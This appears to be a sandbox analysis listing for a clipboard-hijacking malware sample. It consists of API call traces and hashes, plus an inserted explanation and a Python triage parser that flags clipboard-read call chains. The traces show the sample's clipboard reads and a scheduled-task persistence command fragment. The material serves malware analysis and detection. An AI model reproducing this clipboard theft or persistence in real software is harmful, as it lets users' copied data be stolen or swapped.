                                                                                                                                                                                          • Source File: 0000000E.00000002.609445668.0000000000406000.00000020.00020000.sdmp, Offset: 00406000, based on PE: false
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: _write_multi_char$__get_printf_count_output__mbtowc_l_get_int_arg_write_string
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 4168457693-0
                                                                                                                                                                                          • Opcode ID: 44fcc49f60f58285e5f9283564e37d0e290b17b888b1392288584d7e114d89ad
                                                                                                                                                                                          • Instruction ID: 5783ae4fa3ace3306abf742abbb44e072aec33fa5154f1a097697c60da70c7f4
                                                                                                                                                                                          • Opcode Fuzzy Hash: 44fcc49f60f58285e5f9283564e37d0e290b17b888b1392288584d7e114d89ad
                                                                                                                                                                                          • Instruction Fuzzy Hash: A5A1A3F1D442199BDB24DF54CC85BAEB774AB44304F1080AAE609772C1D779AE84CF5E
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000E.00000002.609445668.0000000000406000.00000020.00020000.sdmp, Offset: 00406000, based on PE: false
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: _write_multi_char$__mbtowc_l_get_int_arg_strlen_write_string
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 909868375-0
                                                                                                                                                                                          • Opcode ID: 3be1e5502759e1e7b5207488dc20e90ab2552a12d282a777878a723582cdcecf
                                                                                                                                                                                          • Instruction ID: 76c5c194636e8b2f4865bd4f5cda7f9b0b6a08818c9518e3daf862c3a67a0ccb
                                                                                                                                                                                          • Opcode Fuzzy Hash: 3be1e5502759e1e7b5207488dc20e90ab2552a12d282a777878a723582cdcecf
                                                                                                                                                                                          • Instruction Fuzzy Hash: B7A170B1D042189FDB24CF54CC85BAEB7B5BB44305F1481AAE60A772C1E739AE84CF59
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000E.00000002.609445668.0000000000406000.00000020.00020000.sdmp, Offset: 00406000, based on PE: false
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: __aulldiv__aullrem_get_int64_arg
                                                                                                                                                                                          • String ID: '$0$9
                                                                                                                                                                                          • API String ID: 3120068967-269856862
                                                                                                                                                                                          • Opcode ID: 116f8ebee97dc1323232d8d5e5f82bcaf57024a6c58e21d710bddbb84aa3cbba
                                                                                                                                                                                          • Instruction ID: 07d55785e54881d32caa72cedfa6fe5eea0ab8049c29c9414e6dfe1d52044e4f
                                                                                                                                                                                          • Opcode Fuzzy Hash: 116f8ebee97dc1323232d8d5e5f82bcaf57024a6c58e21d710bddbb84aa3cbba
                                                                                                                                                                                          • Instruction Fuzzy Hash: 9241D4B1D05228DFEB24CF98D889BEEB7B5BB44304F24859AD409A7241D778AEC1CF45
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • lstrlenW.KERNEL32(?,?,02C61A59), ref: 02C6214B
                                                                                                                                                                                          • lstrlenW.KERNEL32(?,?,?,02C61A59), ref: 02C62157
                                                                                                                                                                                          • StrChrW.SHLWAPI(?,00000030,?,?,02C61A59), ref: 02C621B6
                                                                                                                                                                                          • StrChrW.SHLWAPI(?,0000004F,?,00000030,?,?,02C61A59), ref: 02C621C3
                                                                                                                                                                                          • StrChrW.SHLWAPI(?,00000049,?,0000004F,?,00000030,?,?,02C61A59), ref: 02C621D0
                                                                                                                                                                                          • StrChrW.SHLWAPI(?,0000006C,?,00000049,?,0000004F,?,00000030,?,?,02C61A59), ref: 02C621DD
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000E.00000002.609959614.0000000002C60000.00000040.00000001.sdmp, Offset: 02C60000, based on PE: false
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: lstrlen
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 1659193697-0
                                                                                                                                                                                          • Opcode ID: 34e5242f1b3c15c738e08e41ff9107dc44d7df7da787cb389f94cc33d272342b
                                                                                                                                                                                          • Instruction ID: f63b67586383a52337dc7283bea6f5ac8f640931f8808dd44832dce625e51994
                                                                                                                                                                                          • Opcode Fuzzy Hash: 34e5242f1b3c15c738e08e41ff9107dc44d7df7da787cb389f94cc33d272342b
                                                                                                                                                                                          • Instruction Fuzzy Hash: 1711406174916116DB342A286DDCF7E367C6BC25AAB1A4427FF86E40B0D714CFC3918B
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000E.00000002.609445668.0000000000406000.00000020.00020000.sdmp, Offset: 00406000, based on PE: false
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: __aulldiv__aullrem_get_int64_arg
                                                                                                                                                                                          • String ID: 0$9
                                                                                                                                                                                          • API String ID: 3120068967-1975997740
                                                                                                                                                                                          • Opcode ID: 71b3785b80bd961fdd65258f3832804ca2939cb562fbb5e92e2a3f59183cd18f
                                                                                                                                                                                          • Instruction ID: e960a11e4ece91178d3a2e8896ec326cb66e4a59b306e649322599f7164a7816
                                                                                                                                                                                          • Opcode Fuzzy Hash: 71b3785b80bd961fdd65258f3832804ca2939cb562fbb5e92e2a3f59183cd18f
                                                                                                                                                                                          • Instruction Fuzzy Hash: DD41F5B1D05228DFDB24CF98D889BEEB7B5BB44304F20859AD009A7241D778AAC1CF45
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000E.00000002.609445668.0000000000406000.00000020.00020000.sdmp, Offset: 00406000, based on PE: false
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: __aulldiv__aullrem_get_int64_arg
                                                                                                                                                                                          • String ID: '$9
                                                                                                                                                                                          • API String ID: 3120068967-1823400153
                                                                                                                                                                                          • Opcode ID: d3611736a4f00d3dc56c7b6daf18abb9b521060ec6e09dd6e3217bacfd76b68f
                                                                                                                                                                                          • Instruction ID: fdf06efbe065a151bc7ca3d8de09cf6a9abfcdffc1ecb06711ebebe3684aa0c5
                                                                                                                                                                                          • Opcode Fuzzy Hash: d3611736a4f00d3dc56c7b6daf18abb9b521060ec6e09dd6e3217bacfd76b68f
                                                                                                                                                                                          • Instruction Fuzzy Hash: 9F4108B1E045299FDB24CF58C941BAEB7B5FF85314F1080A9D648B7281D3786E81CF5A
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • lstrlenW.KERNEL32(?,?,?,02C61ABD), ref: 02C6229A
                                                                                                                                                                                          • StrChrW.SHLWAPI(?,00000030,?,?,?,02C61ABD), ref: 02C6232B
                                                                                                                                                                                          • StrChrW.SHLWAPI(?,0000004F,?,00000030,?,?,?,02C61ABD), ref: 02C62338
                                                                                                                                                                                          • StrChrW.SHLWAPI(?,00000049,?,0000004F,?,00000030,?,?,?,02C61ABD), ref: 02C62345
                                                                                                                                                                                          • StrChrW.SHLWAPI(?,0000006C,?,00000049,?,0000004F,?,00000030,?,?,?,02C61ABD), ref: 02C62352
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000E.00000002.609959614.0000000002C60000.00000040.00000001.sdmp, Offset: 02C60000, based on PE: false
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: lstrlen
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 1659193697-0
                                                                                                                                                                                          • Opcode ID: 1dfb8a87e815566c9d5978d19a236094ff7e72a8b195f751a92239c3df4cb982
                                                                                                                                                                                          • Instruction ID: 8dabf1dfc9f8d5580f857da9f5b39cb1fc278058b27f69e8ef9bf25f7690aace
                                                                                                                                                                                          • Opcode Fuzzy Hash: 1dfb8a87e815566c9d5978d19a236094ff7e72a8b195f751a92239c3df4cb982
                                                                                                                                                                                          • Instruction Fuzzy Hash: 791107A194A152919B3E1A1D58CC63E2AFC5BCF9987AC0837EE2DE407DD314C3C25257
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • lstrlenW.KERNEL32(?,?,02C61A8B), ref: 02C621F2
                                                                                                                                                                                          • StrChrW.SHLWAPI(?,00000030,?,?,02C61A8B), ref: 02C62251
                                                                                                                                                                                          • StrChrW.SHLWAPI(?,0000004F,?,00000030,?,?,02C61A8B), ref: 02C6225E
                                                                                                                                                                                          • StrChrW.SHLWAPI(?,00000049,?,0000004F,?,00000030,?,?,02C61A8B), ref: 02C6226B
                                                                                                                                                                                          • StrChrW.SHLWAPI(?,0000006C,?,00000049,?,0000004F,?,00000030,?,?,02C61A8B), ref: 02C62278
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000E.00000002.609959614.0000000002C60000.00000040.00000001.sdmp, Offset: 02C60000, based on PE: false
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: lstrlen
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 1659193697-0
                                                                                                                                                                                          • Opcode ID: 328b822c4393c529a9a899670a59262547426000f33717c38db6df60201e6aa8
                                                                                                                                                                                          • Instruction ID: fea8747bd611898e270794846a42abec6af706c172346e5c980e488a7ffac52c
                                                                                                                                                                                          • Opcode Fuzzy Hash: 328b822c4393c529a9a899670a59262547426000f33717c38db6df60201e6aa8
                                                                                                                                                                                          • Instruction Fuzzy Hash: B00171E114016215DB742A2CACCCB7E23599FC7D78B1A4427FE46E60F0E318C7CA518B
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • lstrlenW.KERNEL32(?,00000044,?,00000000,?,?,?,02C615D5), ref: 02C61FE2
                                                                                                                                                                                          • lstrlenW.KERNEL32(/C /create /F /sc minute /mo 1 /tn ",00000044,?,00000000,?,?,?,02C615D5), ref: 02C61FEF
                                                                                                                                                                                          • LocalAlloc.KERNEL32(00000040,00000001,?,02C615D5), ref: 02C62000
                                                                                                                                                                                          • GlobalFree.KERNEL32(?), ref: 02C62021
                                                                                                                                                                                          Strings
                                                                                                                                                                                          • /C /create /F /sc minute /mo 1 /tn ", xrefs: 02C61FEE
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000E.00000002.609959614.0000000002C60000.00000040.00000001.sdmp, Offset: 02C60000, based on PE: false
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: lstrlen$AllocFreeGlobalLocal
                                                                                                                                                                                          • String ID: /C /create /F /sc minute /mo 1 /tn "
                                                                                                                                                                                          • API String ID: 3873415381-4285889591
                                                                                                                                                                                          • Opcode ID: 130ea67c3727dbfe4e8bb06d54dfa35f071c00b44640929ded855d708f63130a
                                                                                                                                                                                          • Instruction ID: 0e2accd316f0740cf4790ddd6ead8351873a64eea53320718b967e6aeada0125
                                                                                                                                                                                          • Opcode Fuzzy Hash: 130ea67c3727dbfe4e8bb06d54dfa35f071c00b44640929ded855d708f63130a
                                                                                                                                                                                          • Instruction Fuzzy Hash: 3501B575600200EFD7205FA9DC89A6ABAFAEFC8312F18043DA286E3361D7B14941DA51
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

APIs
• OpenClipboard.USER32(00000000), ref: 02C61D8F
• GetClipboardData.USER32(0000000D), ref: 02C61D9C
• GlobalFix.KERNEL32(00000000), ref: 02C61DA9
• GlobalUnWire.KERNEL32(00000000), ref: 02C61DB6
• CloseClipboard.USER32 ref: 02C61DBC
Memory Dump Source
• Source File: 0000000E.00000002.609959614.0000000002C60000.00000040.00000001.sdmp, Offset: 02C60000, based on PE: false
Yara matches
Similarity
• API ID: Clipboard$Global$CloseDataOpenWire
• String ID:
• API String ID: 1198520892-0
• Opcode ID: 3c49645208ac729d989d0f948fee9bd6a50bf7ba83a65ea476ea956c222f9c8c
• Instruction ID: 7b2c4b9573123fbccf7064afa3b12f5066a46d4c37b8a204b6c6bbf2f1f61c3c
• Opcode Fuzzy Hash: 3c49645208ac729d989d0f948fee9bd6a50bf7ba83a65ea476ea956c222f9c8c
• Instruction Fuzzy Hash: 96E086B610152197C2222764BD4CB6FAE78AFC1A5270A0139FF05F2211DB74C90185B4
Uniqueness
Uniqueness Score: -1.00%
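The entry above is the routine behind the "Clipboard Hijacker" verdict: it opens the clipboard, asks for format 0000000D (CF_UNICODETEXT = 13), locks the returned handle, unlocks it and closes the clipboard. GlobalFix and GlobalUnWire are legacy kernel32 export names that share their code with GlobalLock and GlobalUnlock, which is why the sandbox's address-based symbol resolution shows them here; the sequence is an ordinary clipboard read. The dump region (02C60000, "based on PE: false") is not backed by an image on disk, consistent with the unpacking signatures listed for this sample. The following Python is an added example, not part of the Joe Sandbox report: a parser for entries in this listing format that extracts each function's API calls and dump-source metadata, then flags the open/get/close clipboard chain for triage. The SAMPLE text is constructed from two entries copied from this page; the layout it assumes (a leading "•" bullet per call, the section headers as rendered here) is the assumption the parser depends on.

```python
"""Parse Joe Sandbox function-listing entries and flag clipboard-read chains.

Added example; not code from the Joe Sandbox report or from the sample.
Assumes the rendered layout above: one "•" bullet per API call, section
headers "APIs", "Memory Dump Source", "Similarity", "Uniqueness", and a
blank line between entries.
"""
import re
from dataclasses import dataclass, field
from typing import List, Optional

# Constructed input: two entries copied from the listing on this page.
SAMPLE = """\
APIs
• OpenClipboard.USER32(00000000), ref: 02C61D8F
• GetClipboardData.USER32(0000000D), ref: 02C61D9C
• GlobalFix.KERNEL32(00000000), ref: 02C61DA9
• GlobalUnWire.KERNEL32(00000000), ref: 02C61DB6
• CloseClipboard.USER32 ref: 02C61DBC
Memory Dump Source
• Source File: 0000000E.00000002.609959614.0000000002C60000.00000040.00000001.sdmp, Offset: 02C60000, based on PE: false
Yara matches
Similarity
• API ID: Clipboard$Global$CloseDataOpenWire
• String ID:
• API String ID: 1198520892-0
Uniqueness
Uniqueness Score: -1.00%

APIs
• GetLastError.KERNEL32 ref: 0041948F
• DeleteFileA.KERNEL32(00421DC8), ref: 0041949A
• LoadLibraryW.KERNEL32(00000000), ref: 004194A2
• FreeEnvironmentStringsA.KERNEL32(00000000), ref: 004194AA
• RtlEnterCriticalSection.NTDLL(?), ref: 004194B4
Memory Dump Source
• Source File: 0000000E.00000002.609445668.0000000000406000.00000020.00020000.sdmp, Offset: 00406000, based on PE: false
Similarity
• API ID: CriticalDeleteEnterEnvironmentErrorFileFreeLastLibraryLoadSectionStrings
Uniqueness
Uniqueness Score: -1.00%
"""

# Win32 clipboard format constants (real values, not assumptions).
CLIPBOARD_FORMATS = {1: "CF_TEXT", 13: "CF_UNICODETEXT"}

HEADERS = {"APIs", "Strings", "Memory Dump Source", "Yara matches", "Similarity", "Uniqueness"}
# "• Name.MODULE(args), ref: ADDR" with args and the comma both optional.
API_RE = re.compile(r"•\s*(?P<name>\w+)\.(?P<module>\w+)"
                    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)")
SOURCE_RE = re.compile(r"Source File:\s*(?P<file>\S+),\s*Offset:\s*(?P<offset>[0-9A-Fa-f]+),"
                       r"\s*based on PE:\s*(?P<pe>true|false)")


@dataclass
class ApiCall:
    name: str
    module: str
    args: List[str]
    ref: int


@dataclass
class Entry:
    calls: List[ApiCall] = field(default_factory=list)
    source_file: str = ""
    offset: Optional[int] = None
    pe_backed: Optional[bool] = None
    api_id: str = ""


def parse_entries(text: str) -> List[Entry]:
    """Split the listing into entries (each starts at an 'APIs' header)."""
    entries: List[Entry] = []
    current: Optional[Entry] = None
    section = None
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        if line == "APIs":
            current = Entry()
            entries.append(current)
        if current is None:
            continue
        if line in HEADERS:
            section = line
            continue
        if section == "APIs":
            m = API_RE.search(line)          # "Part of subcall" lines do not match and are skipped
            if m:
                args = [a for a in m.group("args").split(",") if a] if m.group("args") else []
                current.calls.append(ApiCall(m.group("name"), m.group("module"), args,
                                             int(m.group("ref"), 16)))
        elif section == "Memory Dump Source":
            m = SOURCE_RE.search(line)
            if m:
                current.source_file = m.group("file")
                current.offset = int(m.group("offset"), 16)
                current.pe_backed = m.group("pe") == "true"
        elif section == "Similarity" and line.startswith("• API ID:"):
            current.api_id = line.split(":", 1)[1].strip()
    return entries


def clipboard_read_chain(entry: Entry) -> Optional[str]:
    """Describe the entry if it calls Open -> GetClipboardData -> Close in that order."""
    order = ["OpenClipboard", "GetClipboardData", "CloseClipboard"]
    pos, fmt = 0, "unknown format"
    for call in entry.calls:
        if pos < len(order) and call.name == order[pos]:
            if call.name == "GetClipboardData" and call.args:
                try:
                    code = int(call.args[0], 16)
                    fmt = CLIPBOARD_FORMATS.get(code, f"format {code}")
                except ValueError:       # sandbox prints '?' for unresolved arguments
                    pass
            pos += 1
    return f"clipboard read ({fmt})" if pos == len(order) else None


def triage(text: str) -> List[dict]:
    """Return one finding per entry that reads the clipboard, with where it lives."""
    findings = []
    for e in parse_entries(text):
        desc = clipboard_read_chain(e)
        if desc:
            findings.append({"offset": e.offset, "pe_backed": e.pe_backed,
                             "behaviour": desc, "api_id": e.api_id,
                             "first_ref": e.calls[0].ref})
    return findings


if __name__ == "__main__":
    for f in triage(SAMPLE):
        print(f)
```

Running it on the two constructed entries yields a single finding, at offset 0x02C60000 in a non-PE-backed region, described as a CF_UNICODETEXT clipboard read; the CRT entry at 0x00406000 produces nothing. The same parser can be pointed at the full listing to count how many distinct functions touch the clipboard and whether any of them sit in image-backed code.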

APIs
• GetLastError.KERNEL32 ref: 0041948F
• DeleteFileA.KERNEL32(00421DC8), ref: 0041949A
• LoadLibraryW.KERNEL32(00000000), ref: 004194A2
• FreeEnvironmentStringsA.KERNEL32(00000000), ref: 004194AA
• RtlEnterCriticalSection.NTDLL(?), ref: 004194B4
Memory Dump Source
• Source File: 0000000E.00000002.609445668.0000000000406000.00000020.00020000.sdmp, Offset: 00406000, based on PE: false
Similarity
• API ID: CriticalDeleteEnterEnvironmentErrorFileFreeLastLibraryLoadSectionStrings
• String ID:
• API String ID: 2355528868-0
• Opcode ID: 9f7c975e490926aebf48e2bf078307ce9ea013025e012bc18f92bbb9d763b40d
• Instruction ID: be5c53dd517337924b076f4d2e36b75196b0ade31bde952fcd212899ea8bb193
• Opcode Fuzzy Hash: 9f7c975e490926aebf48e2bf078307ce9ea013025e012bc18f92bbb9d763b40d
• Instruction Fuzzy Hash: 1FF08C35945208DFC701EFA0E85DA9A7F74FB0D302F008661EA5587251CB301965CBEA
Uniqueness
Uniqueness Score: -1.00%

APIs
Strings
Memory Dump Source
• Source File: 0000000E.00000002.609445668.0000000000406000.00000020.00020000.sdmp, Offset: 00406000, based on PE: false
Similarity
• API ID: __aulldiv__aullrem_get_int64_arg
• String ID: 9
• API String ID: 3120068967-2366072709
• Opcode ID: 0ea6146af0f2c26e6f89072181573e13106b90481fae994fd2cb8fba2cd0ab83
• Instruction ID: 7e99398a2989f63ab91d86e5d1f340e94c6fbd712eeb2fe5690cc7a552c25abe
• Opcode Fuzzy Hash: 0ea6146af0f2c26e6f89072181573e13106b90481fae994fd2cb8fba2cd0ab83
• Instruction Fuzzy Hash: 104118B1E041299FDB24CF58C941BAEB7B5FF85314F1080AAD548B7281D3786E85CF5A
Uniqueness
Uniqueness Score: -1.00%

APIs
Strings
Memory Dump Source
• Source File: 0000000E.00000002.609445668.0000000000406000.00000020.00020000.sdmp, Offset: 00406000, based on PE: false
Similarity
• API ID: __aulldiv__aullrem_get_int64_arg
• String ID: 9
• API String ID: 3120068967-2366072709
• Opcode ID: f22af67319abfc7469830822f47527434b550f8be6a7b99d64984b1ad6fb31c5
• Instruction ID: be5f340bf6e2c4c7509da247219f0037cb9acdb6af063adddbb9452891412781
• Opcode Fuzzy Hash: f22af67319abfc7469830822f47527434b550f8be6a7b99d64984b1ad6fb31c5
• Instruction Fuzzy Hash: 454128B1E045299FDB24CF48C981BAEB7B5FF85314F0080A9D648B7281D7786E81CF1A
Uniqueness
Uniqueness Score: -1.00%

APIs
Strings
Memory Dump Source
• Source File: 0000000E.00000002.609445668.0000000000406000.00000020.00020000.sdmp, Offset: 00406000, based on PE: false
Similarity
• API ID: __aulldiv__aullrem_get_int64_arg
• String ID: 9
• API String ID: 3120068967-2366072709
• Opcode ID: d4d663e6eebe0b419f8463e3a84be00d961852047bb7cb56f8a1413bb460c924
• Instruction ID: 04074a4d55adec1fb7484b132e08c3b3bdfbdf4c825e8fe88e8a3d54cb31c223
• Opcode Fuzzy Hash: d4d663e6eebe0b419f8463e3a84be00d961852047bb7cb56f8a1413bb460c924
• Instruction Fuzzy Hash: 5E41C4B1905628DFEB24CF99D889BEEB7B5FB44304F20859AD009A7240D778AAC1CF44
Uniqueness
Uniqueness Score: -1.00%

APIs
Strings
Memory Dump Source
• Source File: 0000000E.00000002.609445668.0000000000406000.00000020.00020000.sdmp, Offset: 00406000, based on PE: false
Similarity
• API ID: _get_int64_arg$__aulldiv__aullrem
• String ID: 9
• API String ID: 2124759748-2366072709
• Opcode ID: 15e2ea9ed52891bb6a2a2a550db8cc62dd7b9df09e391ea8fb6298cdaec576cf
• Instruction ID: e2ad673a9e1fbcd92f3034303dd506abada369279c597e6f7b0f1569caf1cc2c
• Opcode Fuzzy Hash: 15e2ea9ed52891bb6a2a2a550db8cc62dd7b9df09e391ea8fb6298cdaec576cf
• Instruction Fuzzy Hash: BE4109B1E045299FDB24CF58C941B9EB7B5FB85314F1080E9D648A7281D3786E81CF1A
Uniqueness
Uniqueness Score: -1.00%

APIs
Strings
Memory Dump Source
• Source File: 0000000E.00000002.609445668.0000000000406000.00000020.00020000.sdmp, Offset: 00406000, based on PE: false
Similarity
• API ID: _get_int64_arg$__aulldiv__aullrem
• String ID: 9
• API String ID: 2124759748-2366072709
• Opcode ID: abbb330f59fefbac0a25802ba133fbee9826849726f9bb39b00a427fd9cde486
• Instruction ID: 370d043033f9b44dbe123085fe21159393ba80c6a027f265584c43808d9c422b
• Opcode Fuzzy Hash: abbb330f59fefbac0a25802ba133fbee9826849726f9bb39b00a427fd9cde486
• Instruction Fuzzy Hash: A341B2B1905628DFEB24CF99D889BEEB7B5BB44304F20859AD409A7240D778AEC1CF45
Uniqueness
Uniqueness Score: -1.00%

APIs
Strings
Memory Dump Source
• Source File: 0000000E.00000002.609445668.0000000000406000.00000020.00020000.sdmp, Offset: 00406000, based on PE: false
Similarity
• API ID: _write_multi_char$_write_string$__aulldiv__aullrem__mbtowc_l_get_int_arg
• String ID: 9
• API String ID: 830925916-2366072709
• Opcode ID: f4af19855defb4e8757c9dee4cc8f78e5cd9b80091bff6f9ff7b7f1be35c6121
• Instruction ID: 666b9c603c242c8d3fdac598ba9bfaf6b48c2fc0eb3efceb7bcde3098d1ea408
• Opcode Fuzzy Hash: f4af19855defb4e8757c9dee4cc8f78e5cd9b80091bff6f9ff7b7f1be35c6121
• Instruction Fuzzy Hash: F54114B0E405299FDB24CF58C981B9EB7B5BF85314F0081AAE24AA7241C7345E918F59
Uniqueness
Uniqueness Score: -1.00%

APIs
• __getptd.LIBCMTD ref: 00417D2D
  • Part of subcall function 004097C0: __getptd_noexit.LIBCMTD ref: 004097C6
• __getptd.LIBCMTD ref: 00417D3B
• ___DestructExceptionObject.LIBCMTD ref: 00417DA8
Strings
Memory Dump Source
• Source File: 0000000E.00000002.609445668.0000000000406000.00000020.00020000.sdmp, Offset: 00406000, based on PE: false
Similarity
• API ID: __getptd$DestructExceptionObject__getptd_noexit
• String ID: csm
• API String ID: 4290476786-1018135373
• Opcode ID: e3c7c263da429b8e79a76c9b9e45ff382efde3c3abb58278cf50ca065713820e
• Instruction ID: c5ae066ec79feb25a95b830f48a347be30d413994d22970f6ff8f0c253586eec
• Opcode Fuzzy Hash: e3c7c263da429b8e79a76c9b9e45ff382efde3c3abb58278cf50ca065713820e
• Instruction Fuzzy Hash: 6B11E675900208EBCF14DF65E4449EA7776AF54305F54806AE8095B342DB39DEC1CBE9
Uniqueness
Uniqueness Score: -1.00%

APIs
• CopyFileExW.KERNEL32(00421D80,00421D50,00000000,00000000,00000000,00000000,?,?), ref: 00419947
• GetConsoleAliasesLengthA.KERNEL32(00000000), ref: 0041994F
• FindNextFileA.KERNEL32(00000000,?), ref: 00419970
• GetStdHandle.KERNEL32(00000000), ref: 004199AD
Memory Dump Source
• Source File: 0000000E.00000002.609445668.0000000000406000.00000020.00020000.sdmp, Offset: 00406000, based on PE: false
Similarity
• API ID: File$AliasesConsoleCopyFindHandleLengthNext
• String ID:
                                                                                                                                                                                          • API String ID: 3298809309-0
                                                                                                                                                                                          • Opcode ID: ba3f90b7e07babbde7474793b10c1701f4891bdeaec7ef1c4b53b68aae505f26
                                                                                                                                                                                          • Instruction ID: dd6d673cba380057cd47230387bf578ec1fc145cf7a011dd64b80df19d897493
                                                                                                                                                                                          • Opcode Fuzzy Hash: ba3f90b7e07babbde7474793b10c1701f4891bdeaec7ef1c4b53b68aae505f26
                                                                                                                                                                                          • Instruction Fuzzy Hash: 0021F5B4E00218EBDB14CF95CC55BEEBBB5FB48301F1081AAE519A7390D7746A84CF89
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • CopyFileExW.KERNEL32(00421D80,00421D50,00000000,00000000,00000000,00000000,?,?), ref: 00419947
                                                                                                                                                                                          • GetConsoleAliasesLengthA.KERNEL32(00000000), ref: 0041994F
                                                                                                                                                                                          • FindNextFileA.KERNEL32(00000000,?), ref: 00419970
                                                                                                                                                                                          • GetStdHandle.KERNEL32(00000000), ref: 004199AD
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000E.00000002.609445668.0000000000406000.00000020.00020000.sdmp, Offset: 00406000, based on PE: false
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: File$AliasesConsoleCopyFindHandleLengthNext
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 3298809309-0
                                                                                                                                                                                          • Opcode ID: b7b150a1ff63d6d4aebb04a60a102bb373cb812755b12ff2cf7f8e49ef26d6d3
                                                                                                                                                                                          • Instruction ID: b61365670aa742c41b5a739128c8f99abb57d842f36a5c524496bbebd42e7819
                                                                                                                                                                                          • Opcode Fuzzy Hash: b7b150a1ff63d6d4aebb04a60a102bb373cb812755b12ff2cf7f8e49ef26d6d3
                                                                                                                                                                                          • Instruction Fuzzy Hash: 2621F8B4E00218EBDB14CF95DC55BEEBBB5FB48301F1081AAE519A7390D7746A84CF89
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%